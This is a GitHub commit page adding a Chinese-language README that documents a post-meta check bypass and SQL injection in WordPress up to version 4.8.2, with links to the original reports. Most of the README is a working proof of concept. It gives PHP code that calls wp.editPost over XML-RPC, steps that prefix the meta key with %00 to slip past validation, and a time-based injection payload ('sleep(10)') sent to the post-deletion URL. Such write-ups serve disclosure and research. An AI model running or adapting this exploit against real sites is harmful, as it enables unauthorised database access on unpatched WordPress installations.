Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
Mr5m1th authored Nov 24, 2017
1 parent 1b5092d commit 7f7bf40
Showing 1 changed file with 21 additions and 0 deletions.
21 changes: 21 additions & 0 deletions CMS/WordPress/WordPress_v4.8.2/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
# WordPress ≤ 4.8.2 POST META 校验绕过漏洞
## From
* WordPress post meta data checks bypass[https://hackerone.com/reports/265484](https://hackerone.com/reports/265484)
* WordPress <= 4.8.2 SQL Injection POC[http://blog.vulspy.com/2017/11/09/Wordpress-4-8-2-SQL-Injection-POC/](http://blog.vulspy.com/2017/11/09/Wordpress-4-8-2-SQL-Injection-POC/)
## POC
```php
$usr = 'author';
$pwd = 'author';
$xmlrpc = 'http://local.target/xmlrpc.php';
$client = new IXR_Client($xmlrpc);
$content = array("ID" => 6, 'meta_input' => array("_thumbnail_id"=>"xxx"));
$res = $client->query('wp.editPost',0, $usr, $pwd, 6/*post_id*/, $content);
```
### `%00_`来bypass

### STEP

* Add New Custom Field, Name:_thumbnail_id Value:`55 %1$%s or sleep(10)#`
* Click Add Custom Field button.
* Modify the HTTP request, `_thumbnail_id => %00_thumbnail_id`
* Launch the attack. Visit `/wp-admin/edit.php?action=delete&_wpnonce=xxx&ids=55 %1$%s or sleep(10)#.`

0 comments on commit 7f7bf40

Please sign in to comment.